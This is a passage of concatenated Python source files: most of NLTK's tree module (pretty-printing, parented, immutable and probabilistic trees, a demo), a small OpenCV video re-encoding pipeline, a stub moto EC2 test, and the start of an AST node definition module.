_canvas_frame.destroy_widget(widget)
subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
'-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
.format(out_path, in_path).split())
with open(out_path, 'rb') as sr:
res = sr.read()
os.remove(in_path)
os.remove(out_path)
return base64.b64encode(res).decode()
def __str__(self):
return self.pformat()
def pprint(self, **kwargs):
"""
Print a string representation of this Tree to 'stream'
"""
if "stream" in kwargs:
stream = kwargs["stream"]
del kwargs["stream"]
else:
stream = None
print(self.pformat(**kwargs), file=stream)
def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
"""
:return: A pretty-printed string representation of this tree.
:rtype: str
:param margin: The right margin at which to do line-wrapping.
:type margin: int
:param indent: The indentation level at which printing
begins. This number is used to decide how far to indent
subsequent lines.
:type indent: int
:param nodesep: A string that is used to separate the node
from the children. E.g., the default value ``':'`` gives
trees like ``(S: (NP: I) (VP: (V: saw) (NP: it)))``.
"""
# Try writing it on one line.
s = self._pformat_flat(nodesep, parens, quotes)
if len(s) + indent < margin:
return s
# If it doesn't fit on one line, then write it on multi-lines.
if isinstance(self._label, string_types):
s = '%s%s%s' % (parens[0], self._label, nodesep)
else:
s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
for child in self:
if isinstance(child, Tree):
s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
nodesep, parens, quotes)
elif isinstance(child, tuple):
s += '\n'+' '*(indent+2)+ "/".join(child)
elif isinstance(child, string_types) and not quotes:
s += '\n'+' '*(indent+2)+ '%s' % child
else:
s += '\n'+' '*(indent+2)+ unicode_repr(child)
return s+parens[1]
def pformat_latex_qtree(self):
r"""
Returns a representation of the tree compatible with the
LaTeX qtree package. This consists of the string ``\Tree``
followed by the tree represented in bracketed notation.
For example, the following result was generated from a parse tree of
the sentence ``The announcement astounded us``::
\Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
[.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]
See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
style file for the qtree package.
:return: A latex qtree representation of this tree.
:rtype: str
"""
reserved_chars = re.compile('([#\$%&~_\{\}])')
pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
def _pformat_flat(self, nodesep, parens, quotes):
childstrs = []
for child in self:
if isinstance(child, Tree):
childstrs.append(child._pformat_flat(nodesep, parens, quotes))
elif isinstance(child, tuple):
childstrs.append("/".join(child))
elif isinstance(child, string_types) and not quotes:
childstrs.append('%s' % child)
else:
childstrs.append(unicode_repr(child))
if isinstance(self._label, string_types):
return '%s%s%s %s%s' % (parens[0], self._label, nodesep,
" ".join(childstrs), parens[1])
else:
return '%s%s%s %s%s' % (parens[0], unicode_repr(self._label), nodesep,
" ".join(childstrs), parens[1])
class ImmutableTree(Tree):
def __init__(self, node, children=None):
super(ImmutableTree, self).__init__(node, children)
# Precompute our hash value. This ensures that we're really
# immutable. It also means we only have to calculate it once.
try:
self._hash = hash((self._label, tuple(self)))
except (TypeError, ValueError):
raise ValueError("%s: node value and children "
"must be immutable" % type(self).__name__)
def __setitem__(self, index, value):
raise ValueError('%s may not be modified' % type(self).__name__)
def __setslice__(self, i, j, value):
raise ValueError('%s may not be modified' % type(self).__name__)
def __delitem__(self, index):
raise ValueError('%s may not be modified' % type(self).__name__)
def __delslice__(self, i, j):
raise ValueError('%s may not be modified' % type(self).__name__)
def __iadd__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def __imul__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def append(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def extend(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def pop(self, v=None):
raise ValueError('%s may not be modified' % type(self).__name__)
def remove(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def reverse(self):
raise ValueError('%s may not be modified' % type(self).__name__)
def sort(self):
raise ValueError('%s may not be modified' % type(self).__name__)
def __hash__(self):
return self._hash
def set_label(self, value):
"""
Set the node label. This will only succeed the first time the
node label is set, which should occur in ImmutableTree.__init__().
"""
if hasattr(self, '_label'):
raise ValueError('%s may not be modified' % type(self).__name__)
self._label = value
######################################################################
## Parented trees
######################################################################
class AbstractParentedTree(Tree):
"""
An abstract base class for a ``Tree`` that automatically maintains
pointers to parent nodes. These parent pointers are updated
whenever any change is made to a tree's structure. Two subclasses
are currently defined:
- ``ParentedTree`` is used for tree structures where each subtree
has at most one parent. This class should be used in cases
where there is no"sharing" of subtrees.
- ``MultiParentedTree`` is used for tree structures where a
subtree may have zero or more parents. This class should be
used in cases where subtrees may be shared.
Subclassing
===========
The ``AbstractParentedTree`` class redefines all operations that
modify a tree's structure to call two methods, which are used by
subclasses to update parent information:
- ``_setparent()`` is called whenever a new child is added.
- ``_delparent()`` is called whenever a child is removed.
"""
def __init__(self, node, children=None):
super(AbstractParentedTree, self).__init__(node, children)
# If children is None, the tree is read from node, and
# all parents will be set during parsing.
if children is not None:
# Otherwise we have to set the parent of the children.
# Iterate over self, and *not* children, because children
# might be an iterator.
for i, child in enumerate(self):
if isinstance(child, Tree):
self._setparent(child, i, dry_run=True)
for i, child in enumerate(self):
if isinstance(child, Tree):
self._setparent(child, i)
#////////////////////////////////////////////////////////////
# Parent management
#////////////////////////////////////////////////////////////
def _setparent(self, child, index, dry_run=False):
"""
Update the parent pointer of ``child`` to point to ``self``. This
method is only called if the type of ``child`` is ``Tree``;
i.e., it is not called when adding a leaf to a tree. This method
is always called before the child is actually added to the
child list of ``self``.
:type child: Tree
:type index: int
:param index: The index of ``child`` in ``self``.
:raise TypeError: If ``child`` is a tree with an impropriate
type. Typically, if ``child`` is a tree, then its type needs
to match the type of ``self``. This prevents mixing of
different tree types (single-parented, multi-parented, and
non-parented).
:param dry_run: If true, the don't actually set the child's
parent pointer; just check for any error conditions, and
raise an exception if one is found.
"""
raise NotImplementedError()
def _delparent(self, child, index):
"""
Update the parent pointer of ``child`` to not point to self. This
method is only called if the type of ``child`` is ``Tree``; i.e., it
is not called when removing a leaf from a tree. This method
is always called before the child is actually removed from the
child list of ``self``.
:type child: Tree
:type index: int
:param index: The index of ``child`` in ``self``.
"""
raise NotImplementedError()
#////////////////////////////////////////////////////////////
# Methods that add/remove children
#////////////////////////////////////////////////////////////
# Every method that adds or removes a child must make
# appropriate calls to _setparent() and _delparent().
def __delitem__(self, index):
# del ptree[start:stop]
if isinstance(index, slice):
start, stop, step = slice_bounds(self, index, allow_step=True)
# Clear all the children pointers.
for i in range(start, stop, step):
if isinstance(self[i], Tree):
self._delparent(self[i], i)
# Delete the children from our child list.
super(AbstractParentedTree, self).__delitem__(index)
# del ptree[i]
elif isinstance(index, int):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
# Clear the child's parent pointer.
if isinstance(self[index], Tree):
self._delparent(self[index], index)
# Remove the child from our child list.
super(AbstractParentedTree, self).__delitem__(index)
elif isinstance(index, (list, tuple)):
# del ptree[()]
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
# del ptree[(i,)]
elif len(index) == 1:
del self[index[0]]
# del ptree[i1, i2, i3]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
# ptree[start:stop] = value
if isinstance(index, slice):
start, stop, step = slice_bounds(self, index, allow_step=True)
# make a copy of value, in case it's an iterator
if not isinstance(value, (list, tuple)):
value = list(value)
# Check for any error conditions, so we can avoid ending
# up in an inconsistent state if an error does occur.
for i, child in enumerate(value):
if isinstance(child, Tree):
self._setparent(child, start + i*step, dry_run=True)
# clear the child pointers of all parents we're removing
for i in range(start, stop, step):
if isinstance(self[i], Tree):
self._delparent(self[i], i)
# set the child pointers of the new children. We do this
# after clearing *all* child pointers, in case we're e.g.
# reversing the elements in a tree.
for i, child in enumerate(value):
if isinstance(child, Tree):
self._setparent(child, start + i*step)
# finally, update the content of the child list itself.
super(AbstractParentedTree, self).__setitem__(index, value)
# ptree[i] = value
elif isinstance(index, int):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
# if the value is not changing, do nothing.
if value is self[index]:
return
# Set the new child's parent pointer.
if isinstance(value, Tree):
self._setparent(value, index)
# Remove the old child's parent pointer
if isinstance(self[index], Tree):
self._delparent(self[index], index)
# Update our child list.
super(AbstractParentedTree, self).__setitem__(index, value)
elif isinstance(index, (list, tuple)):
# ptree[()] = value
if len(index) == 0:
raise IndexError('The tree position () may not be assigned to.')
# ptree[(i,)] = value
elif len(index) == 1:
self[index[0]] = value
# ptree[i1, i2, i3] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def append(self, child):
if isinstance(child, Tree):
self._setparent(child, len(self))
super(AbstractParentedTree, self).append(child)
def extend(self, children):
for child in children:
if isinstance(child, Tree):
self._setparent(child, len(self))
super(AbstractParentedTree, self).append(child)
def insert(self, index, child):
# Handle negative indexes. Note that if index < -len(self),
# we do *not* raise an IndexError, unlike __getitem__. This
# is done for consistency with list.__getitem__ and list.index.
if index < 0: index += len(self)
if index < 0: index = 0
# Set the child's parent, and update our child list.
if isinstance(child, Tree):
self._setparent(child, index)
super(AbstractParentedTree, self).insert(index, child)
def pop(self, index=-1):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
if isinstance(self[index], Tree):
self._delparent(self[index], index)
return super(AbstractParentedTree, self).pop(index)
# n.b.: like `list`, this is done by equality, not identity!
# To remove a specific child, use del ptree[i].
def remove(self, child):
index = self.index(child)
if isinstance(self[index], Tree):
self._delparent(self[index], index)
super(AbstractParentedTree, self).remove(child)
# We need to implement __getslice__ and friends, even though
# they're deprecated, because otherwise list.__getslice__ will get
# called (since we're subclassing from list). Just delegate to
# __getitem__ etc., but use max(0, start) and max(0, stop) because
# because negative indices are already handled *before*
# __getslice__ is called; and we don't want to double-count them.
if hasattr(list, '__getslice__'):
def __getslice__(self, start, stop):
return self.__getitem__(slice(max(0, start), max(0, stop)))
def __delslice__(self, start, stop):
return self.__delitem__(slice(max(0, start), max(0, stop)))
def __setslice__(self, start, stop, value):
return self.__setitem__(slice(max(0, start), max(0, stop)), value)
class ParentedTree(AbstractParentedTree):
"""
A ``Tree`` that automatically maintains parent pointers for
single-parented trees. The following are methods for querying
the structure of a parented tree: ``parent``, ``parent_index``,
``left_sibling``, ``right_sibling``, ``root``, ``treeposition``.
Each ``ParentedTree`` may have at most one parent. In
particular, subtrees may not be shared. Any attempt to reuse a
single ``ParentedTree`` as a child of more than one parent (or
as multiple children of the same parent) will cause a
``ValueError`` exception to be raised.
``ParentedTrees`` should never be used in the same tree as ``Trees``
or ``MultiParentedTrees``. Mixing tree implementations may result
in incorrect parent pointers and in ``TypeError`` exceptions.
"""
def __init__(self, node, children=None):
self._parent = None
"""The parent of this Tree, or None if it has no parent."""
super(ParentedTree, self).__init__(node, children)
if children is None:
# If children is None, the tree is read from node.
# After parsing, the parent of the immediate children
# will point to an intermediate tree, not self.
# We fix this by brute force:
for i, child in enumerate(self):
if isinstance(child, Tree):
child._parent = None
self._setparent(child, i)
def _frozen_class(self): return ImmutableParentedTree
#/////////////////////////////////////////////////////////////////
# Methods
#/////////////////////////////////////////////////////////////////
def parent(self):
"""The parent of this tree, or None if it has no parent."""
return self._parent
def parent_index(self):
"""
The index of this tree in its parent. I.e.,
``ptree.parent()[ptree.parent_index()] is ptree``. Note that
``ptree.parent_index()`` is not necessarily equal to
``ptree.parent.index(ptree)``, since the ``index()`` method
returns the first child that is equal to its argument.
"""
if self._parent is None: return None
for i, child in enumerate(self._parent):
if child is self: return i
assert False, 'expected to find self in self._parent!'
def left_sibling(self):
"""The left sibling of this tree, or None if it has none."""
parent_index = self.parent_index()
if self._parent and parent_index > 0:
return self._parent[parent_index-1]
return None # no left sibling
def right_sibling(self):
"""The right sibling of this tree, or None if it has none."""
parent_index = self.parent_index()
if self._parent and parent_index < (len(self._parent)-1):
return self._parent[parent_index+1]
return None # no right sibling
def root(self):
"""
The root of this tree. I.e., the unique ancestor of this tree
whose parent is None. If ``ptree.parent()`` is None, then
``ptree`` is its own root.
"""
root = self
while root.parent() is not None:
root = root.parent()
return root
def treeposition(self):
"""
The tree position of this tree, relative to the root of the
tree. I.e., ``ptree.root[ptree.treeposition] is ptree``.
"""
if self.parent() is None:
return ()
else:
return self.parent().treeposition() + (self.parent_index(),)
#/////////////////////////////////////////////////////////////////
# Parent Management
#/////////////////////////////////////////////////////////////////
def _delparent(self, child, index):
# Sanity checks
assert isinstance(child, ParentedTree)
assert self[index] is child
assert child._parent is self
# Delete child's parent pointer.
child._parent = None
def _setparent(self, child, index, dry_run=False):
# If the child's type is incorrect, then complain.
if not isinstance(child, ParentedTree):
raise TypeError('Can not insert a non-ParentedTree '+
'into a ParentedTree')
# If child already has a parent, then complain.
if child._parent is not None:
raise ValueError('Can not insert a subtree that already '
'has a parent.')
# Set child's parent pointer & index.
if not dry_run:
child._parent = self
class MultiParentedTree(AbstractParentedTree):
"""
A ``Tree`` that automatically maintains parent pointers for
multi-parented trees. The following are methods for querying the
structure of a multi-parented tree: ``parents()``, ``parent_indices()``,
``left_siblings()``, ``right_siblings()``, ``roots``, ``treepositions``.
Each ``MultiParentedTree`` may have zero or more parents. In
particular, subtrees may be shared. If a single
``MultiParentedTree`` is used as multiple children of the same
parent, then that parent will appear multiple times in its
``parents()`` method.
``MultiParentedTrees`` should never be used in the same tree as
``Trees`` or ``ParentedTrees``. Mixing tree implementations may
result in incorrect parent pointers and in ``TypeError`` exceptions.
"""
def __init__(self, node, children=None):
self._parents = []
"""A list of this tree's parents. This list should not
contain duplicates, even if a parent contains this tree
multiple times."""
super(MultiParentedTree, self).__init__(node, children)
if children is None:
# If children is None, the tree is read from node.
# After parsing, the parent(s) of the immediate children
# will point to an intermediate tree, not self.
# We fix this by brute force:
for i, child in enumerate(self):
if isinstance(child, Tree):
child._parents = []
self._setparent(child, i)
def _frozen_class(self): return ImmutableMultiParentedTree
#/////////////////////////////////////////////////////////////////
# Methods
#/////////////////////////////////////////////////////////////////
def parents(self):
"""
The set of parents of this tree. If this tree has no parents,
then ``parents`` is the empty set. To check if a tree is used
as multiple children of the same parent, use the
``parent_indices()`` method.
:type: list(MultiParentedTree)
"""
return list(self._parents)
def left_siblings(self):
"""
A list of all left siblings of this tree, in any of its parent
trees. A tree may be its own left sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the left sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index-1]
for (parent, index) in self._get_parent_indices()
if index > 0]
def right_siblings(self):
"""
A list of all right siblings of this tree, in any of its parent
trees. A tree may be its own right sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the right sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index+1]
for (parent, index) in self._get_parent_indices()
if index < (len(parent)-1)]
def _get_parent_indices(self):
return [(parent, index)
for parent in self._parents
for index, child in enumerate(parent)
if child is self]
def roots(self):
"""
The set of all roots of this tree. This set is formed by
tracing all possible parent paths until trees with no parents
are found.
:type: list(MultiParentedTree)
"""
return list(self._get_roots_helper({}).values())
def _get_roots_helper(self, result):
if self._parents:
for parent in self._parents:
parent._get_roots_helper(result)
else:
result[id(self)] = self
return result
def parent_indices(self, parent):
"""
Return a list of the indices where this tree occurs as a child
of ``parent``. If this child does not occur as a child of
``parent``, then the empty list is returned. The following is
always true::
for parent_index in ptree.parent_indices(parent):
parent[parent_index] is ptree
"""
if parent not in self._parents: return []
else: return [index for (index, child) in enumerate(parent)
if child is self]
def treepositions(self, root):
"""
Return a list of all tree positions that can be used to reach
this multi-parented tree starting from ``root``. I.e., the
following is always true::
for treepos in ptree.treepositions(root):
root[treepos] is ptree
"""
if self is root:
return [()]
else:
return [treepos+(index,)
for parent in self._parents
for treepos in parent.treepositions(root)
for (index, child) in enumerate(parent) if child is self]
#/////////////////////////////////////////////////////////////////
# Parent Management
#/////////////////////////////////////////////////////////////////
def _delparent(self, child, index):
# Sanity checks
assert isinstance(child, MultiParentedTree)
assert self[index] is child
assert len([p for p in child._parents if p is self]) == 1
# If the only copy of child in self is at index, then delete
# self from child's parent list.
for i, c in enumerate(self):
if c is child and i != index: break
else:
child._parents.remove(self)
def _setparent(self, child, index, dry_run=False):
# If the child's type is incorrect, then complain.
if not isinstance(child, MultiParentedTree):
raise TypeError('Can not insert a non-MultiParentedTree '+
'into a MultiParentedTree')
# Add self as a parent pointer if it's not already listed.
if not dry_run:
for parent in child._parents:
if parent is self: break
else:
child._parents.append(self)
class ImmutableParentedTree(ImmutableTree, ParentedTree):
pass
class ImmutableMultiParentedTree(ImmutableTree, MultiParentedTree):
pass
######################################################################
## Probabilistic trees
######################################################################
@python_2_unicode_compatible
class ProbabilisticTree(Tree, ProbabilisticMixIn):
def __init__(self, node, children=None, **prob_kwargs):
Tree.__init__(self, node, children)
ProbabilisticMixIn.__init__(self, **prob_kwargs)
# We have to patch up these methods to make them work right:
def _frozen_class(self): return ImmutableProbabilisticTree
def __repr__(self):
return '%s (p=%r)' % (Tree.unicode_repr(self), self.prob())
def __str__(self):
return '%s (p=%.6g)' % (self.pformat(margin=60), self.prob())
def copy(self, deep=False):
if not deep: return type(self)(self._label, self, prob=self.prob())
else: return type(self).convert(self)
@classmethod
def convert(cls, val):
if isinstance(val, Tree):
children = [cls.convert(child) for child in val]
if isinstance(val, ProbabilisticMixIn):
return cls(val._label, children, prob=val.prob())
else:
return cls(val._label, children, prob=1.0)
else:
return val
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self), self.prob()) ==
(other._label, list(other), other.prob()))
def __lt__(self, other):
if not isinstance(other, Tree):
raise_unorderable_types("<", self, other)
if self.__class__ is other.__class__:
return ((self._label, list(self), self.prob()) <
(other._label, list(other), other.prob()))
else:
return self.__class__.__name__ < other.__class__.__name__
@python_2_unicode_compatible
class ImmutableProbabilisticTree(ImmutableTree, ProbabilisticMixIn):
def __init__(self, node, children=None, **prob_kwargs):
ImmutableTree.__init__(self, node, children)
ProbabilisticMixIn.__init__(self, **prob_kwargs)
self._hash = hash((self._label, tuple(self), self.prob()))
# We have to patch up these methods to make them work right:
def _frozen_class(self): return ImmutableProbabilisticTree
def __repr__(self):
return '%s [%s]' % (Tree.unicode_repr(self), self.prob())
def __str__(self):
return '%s [%s]' % (self.pformat(margin=60), self.prob())
def copy(self, deep=False):
if not deep: return type(self)(self._label, self, prob=self.prob())
else: return type(self).convert(self)
@classmethod
def convert(cls, val):
if isinstance(val, Tree):
children = [cls.convert(child) for child in val]
if isinstance(val, ProbabilisticMixIn):
return cls(val._label, children, prob=val.prob())
else:
return cls(val._label, children, prob=1.0)
else:
return val
def _child_names(tree):
names = []
for child in tree:
if isinstance(child, Tree):
names.append(Nonterminal(child._label))
else:
names.append(child)
return names
######################################################################
## Parsing
######################################################################
def bracket_parse(s):
"""
Use Tree.read(s, remove_empty_top_bracketing=True) instead.
"""
raise NameError("Use Tree.read(s, remove_empty_top_bracketing=True) instead.")
def sinica_parse(s):
"""
Parse a Sinica Treebank string and return a tree. Trees are represented as nested brackettings,
as shown in the following example (X represents a Chinese character):
S(goal:NP(Head:Nep:XX)|theme:NP(Head:Nhaa:X)|quantity:Dab:X|Head:VL2:X)#0(PERIODCATEGORY)
:return: A tree corresponding to the string representation.
:rtype: Tree
:param s: The string to be converted
:type s: str
"""
tokens = re.split(r'([()| ])', s)
for i in range(len(tokens)):
if tokens[i] == '(':
tokens[i-1], tokens[i] = tokens[i], tokens[i-1] # pull nonterminal inside parens
elif ':' in tokens[i]:
fields = tokens[i].split(':')
if len(fields) == 2: # non-terminal
tokens[i] = fields[1]
else:
tokens[i] = "(" + fields[-2] + " " + fields[-1] + ")"
elif tokens[i] == '|':
tokens[i] = ''
treebank_string = " ".join(tokens)
return Tree.fromstring(treebank_string, remove_empty_top_bracketing=True)
# s = re.sub(r'^#[^\s]*\s', '', s) # remove leading identifier
# s = re.sub(r'\w+:', '', s) # remove role tags
# return s
######################################################################
## Demonstration
######################################################################
def demo():
"""
A demonstration showing how Trees and Trees can be
used. This demonstration creates a Tree, and loads a
Tree from the Treebank corpus,
and shows the results of calling several of their methods.
"""
from nltk import Tree, ProbabilisticTree
# Demonstrate tree parsing.
s = '(S (NP (DT the) (NN cat)) (VP (VBD ate) (NP (DT a) (NN cookie))))'
t = Tree.fromstring(s)
print("Convert bracketed string into tree:")
print(t)
print(t.__repr__())
print("Display tree properties:")
print(t.label()) # tree's constituent type
print(t[0]) # tree's first child
print(t[1]) # tree's second child
print(t.height())
print(t.leaves())
print(t[1])
print(t[1,1])
print(t[1,1,0])
# Demonstrate tree modification.
the_cat = t[0]
the_cat.insert(1, Tree.fromstring('(JJ big)'))
print("Tree modification:")
print(t)
t[1,1,1] = Tree.fromstring('(NN cake)')
print(t)
print()
# Tree transforms
print("Collapse unary:")
t.collapse_unary()
print(t)
print("Chomsky normal form:")
t.chomsky_normal_form()
print(t)
print()
# Demonstrate probabilistic trees.
pt = ProbabilisticTree('x', ['y', 'z'], prob=0.5)
print("Probabilistic Tree:")
print(pt)
print()
# Demonstrate parsing of treebank output format.
t = Tree.fromstring(t.pformat())
print("Convert tree to bracketed string and back again:")
print(t)
print()
# Demonstrate LaTeX output
print("LaTeX output:")
print(t.pformat_latex_qtree())
print()
# Demonstrate Productions
print("Production output:")
print(t.productions())
print()
# Demonstrate tree nodes containing objects other than strings
t.set_label(('test', 3))
print(t)
__all__ = ['ImmutableProbabilisticTree', 'ImmutableTree', 'ProbabilisticMixIn',
'ProbabilisticTree', 'Tree', 'bracket_parse',
'sinica_parse', 'ParentedTree', 'MultiParentedTree',
'ImmutableParentedTree', 'ImmutableMultiParentedTree']
| nelango/ViralityAnalysis | model/lib/nltk/tree.py | Python | mit | 64,375 | 0.003216 |
# Copyright 2019 Google LLC.
"""Pipeline to decode and reencode a video using OpenCV."""
from absl import app
from absl import flags
from video_processing import processor_runner
from video_processing.processors import opencv_video_decoder
from video_processing.processors import opencv_video_encoder
flags.DEFINE_string('input_video_file', '', 'Input file.')
flags.DEFINE_string('output_video_file', '', 'Output file.')
FLAGS = flags.FLAGS
def pipeline(input_video_file, output_video_file):
return [
opencv_video_decoder.OpenCVVideoDecoderProcessor(
{'input_video_file': input_video_file}),
opencv_video_encoder.OpenCVVideoEncoderProcessor(
{'output_video_file': output_video_file})
]
def main(unused_argv):
processor_runner.run_processor_chain(
pipeline(FLAGS.input_video_file, FLAGS.output_video_file))
if __name__ == '__main__':
app.run(main)
| learningequality/video-vectorization | video_processing/pipelines/simple_encode_decode.py | Python | mit | 902 | 0.003326 |
import boto
import sure # noqa
from moto import mock_ec2
@mock_ec2
def test_placement_groups():
pass
| andresriancho/moto | tests/test_ec2/test_placement_groups.py | Python | apache-2.0 | 109 | 0 |
# encoding: utf-8
"""
The :mod:`ast` module contains the classes comprising the Python abstract syntax tree.
All attributes ending with ``loc`` contain instances of :class:`.source.Range`
or None. All attributes ending with ``_locs`` contain lists of instances of
:class:`.source.Range` or [].
The attribute ``loc``, present in every class except those inheriting :class:`boolop`,
has a special meaning: it encompasses the entire AST node, so that it is possible
to cut the range contained inside ``loc`` of a parsetree fragment and paste it
somewhere else without altering said parsetree fragment that.
The AST format for all supported versions is generally normalized to be a superset
of the native :mod:`..ast` module of the latest supported Python version.
In particular this affects:
* :class:`With`: on 2.6-2.7 it uses the 3.0 format.
* :class:`TryExcept` and :class:`TryFinally`: on 2.6-2.7 they're replaced with
:class:`Try` from 3.0.
* :class:`arguments`: on 2.6-3.1 it uses the 3.2 format, with dedicated
:class:`arg` in ``vararg`` and ``kwarg`` slots.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# Location mixins
class commonloc(object):
"""
A mixin common for all nodes.
:cvar _locs: (tuple of strings)
names of all attributes with location values
:ivar loc: range encompassing all locations defined for this node
or its children
"""
_locs = ("loc",)
def _reprfields(self):
return self._fields + self._locs
def __repr__(self):
def value(name):
try:
loc = self.__dict__[name]
if isinstance(loc, list):
return "[%s]" % (", ".join(map(repr, loc)))
else:
return repr(loc)
except:
return "(!!!MISSING!!!)"
fields = ", ".join(map(lambda name: "%s=%s" % (name, value(name)),
self._reprfields()))
return "%s(%s)" % (self.__class__.__name__, fields)
@property
def lineno(self):
return self.loc.line()
class keywordloc(commonloc):
"""
A mixin common for all keyword statements, e.g. ``pass`` and ``yield expr``.
:ivar keyword_loc: location of the keyword, e.g. ``yield``.
"""
_locs = commonloc._locs + ("keyword_loc",)
class beginendloc(commonloc):
"""
A mixin common for nodes with a opening and closing delimiters, e.g. tuples and lists.
:ivar begin_loc: location of the opening delimiter, e.g. ``(``.
:ivar end_loc: location of the closing delimiter, e.g. ``)``.
"""
_locs = commonloc._locs + ("begin_loc", "end_loc")
# AST nodes
class AST(object):
"""
An ancestor of all nodes.
:cvar _fields: (tuple of strings)
names of all attributes with semantic values
"""
_fields = ()
def __init__(self, **fields):
for field in fields:
setattr(self, field, fields[field])
class alias(AST, commonloc):
"""
An import alias, e.g. ``x as y``.
:ivar name: (string) value to import
:ivar asname: (string) name to add to the environment
:ivar name_loc: location of name
:ivar as_loc: location of ``as``
:ivar asname_loc: location of asname
"""
_fields = ("name", "asname")
_locs = commonloc._locs + ("name_loc", "as_loc", "asname_loc")
class arg(AST, commonloc):
"""
A formal argument, e.g. in ``def f(x)`` or ``def f(x: T)``.
:ivar arg: (string) argument name
:ivar annotation: (:class:`AST`) type annotation, if any; **emitted since 3.0**
:ivar arg_loc: location of argument name
:ivar colon_loc: location of ``:``, if any; **emitted since 3.0**
"""
_fields = ("arg", "annotation")
_locs = commonloc._locs + ("arg_loc", "colon_loc")
class arguments(AST, beginendloc):
"""
Function definition arguments, e.g. in ``def f(x, y=1, *z, **t)``.
:ivar args: (list of :class:`arg`) regular formal arguments
:ivar defaults: (list of :class:`AST`) values of default arguments
:ivar vararg: (:class:`arg`) splat formal argument (if any), e.g. in ``*x``
:ivar kwonlyargs: (list of :class:`arg`) keyword-only (post-\*) formal arguments;
**emitted since 3.0**
:ivar kw_defaults: (list of :class:`AST`) values of default keyword-only arguments;
**emitted since 3.0**
:ivar kwarg: (:class:`arg`) keyword splat formal argument (if any), e.g. in ``**x``
:ivar star_loc: location of ``*``, if any
:ivar dstar_loc: location of ``**``, if any
:ivar equals_locs: locations of ``=``
:ivar kw_equals_locs: locations of ``=`` of default keyword-only arguments;
**emitted since 3.0**
"""
_fields = ("args", "vararg", "kwonlyargs", "kwarg", "defaults", "kw_defaults")
_locs = beginendloc._locs + ("star_loc", "dstar_loc", "equals_locs", "kw_equals_locs")
class boolop(AST, commonloc):
"""
Base class for binary boolean operators.
This class is unlike others in that it does not have the ``loc`` field.
It serves only as an indicator of operation and corresponds to no source
itself; locations are recorded in :class:`BoolOp`.
"""
_locs = ()
class And(boolop):
"""The ``and`` operator."""
class Or(boolop):
"""The ``or`` operator."""
class cmpop(AST, commonloc):
"""Base class for comparison operators."""
class Eq(cmpop):
"""The ``==`` operator."""
class Gt(cmpop):
"""The ``>`` operator."""
class GtE(cmpop):
"""The ``>=`` operator."""
class In(cmpop):
"""The ``in`` operator."""
class Is(cmpop):
"""The ``is`` operator."""
class IsNot(cmpop):
"""The ``is not`` operator."""
class Lt(cmpop):
"""The ``<`` operator."""
class LtE(cmpop):
"""The ``<=`` operator."""
class NotEq(cmpop):
"""The ``!=`` (or deprecated ``<>``) operator."""
class NotIn(cmpop):
"""The ``not in`` operator."""
class comprehension(AST, commonloc):
"""
A single ``for`` list comprehension clause.
:ivar target: (assignable :class:`AST`) the variable(s) bound in comprehension body
:ivar iter: (:class:`AST`) the expression being iterated
:ivar ifs: (list of :class:`AST`) the ``if`` clauses
:ivar for_loc: location of the ``for`` keyword
:ivar in_loc: location of the ``in`` keyword
:ivar if_locs: locations of ``if`` keywords
"""
_fields = ("target", "iter", "ifs")
_locs = commonloc._locs + ("for_loc", "in_loc", "if_locs")
class excepthandler(AST, commonloc):
"""Base class for the exception handler."""
class ExceptHandler(excepthandler):
"""
An exception handler, e.g. ``except x as y:· z``.
:ivar type: (:class:`AST`) type of handled exception, if any
:ivar name: (assignable :class:`AST` **until 3.0**, string **since 3.0**)
variable bound to exception, if any
:ivar body: (list of :class:`AST`) code to execute when exception is caught
:ivar except_loc: location of ``except``
:ivar as_loc: location of ``as``, if any
:ivar name_loc: location of variable name
:ivar colon_loc: location of ``:``
"""
_fields = ("type", "name", "body")
_locs = excepthandler._locs + ("except_loc", "as_loc", "name_loc", "colon_loc")
class expr(AST, commonloc):
"""Base class for expression nodes."""
class Attribute(expr):
"""
An attribute access, e.g. ``x.y``.
:ivar value: (:class:`AST`) left-hand side
:ivar attr: (string) attribute name
"""
_fields = ("value", "attr", "ctx")
_locs = expr._locs + ("dot_loc", "attr_loc")
class BinOp(expr):
"""
A binary operation, e.g. ``x + y``.
:ivar left: (:class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar right: (:class:`AST`) right-hand side
"""
_fields = ("left", "op", "right")
class BoolOp(expr):
"""
A boolean operation, e.g. ``x and y``.
:ivar op: (:class:`boolop`) operator
:ivar values: (list of :class:`AST`) operands
:ivar op_locs: locations of operators
"""
_fields = ("op", "values")
_locs = expr._locs + ("op_locs",)
class Call(expr, beginendloc):
"""
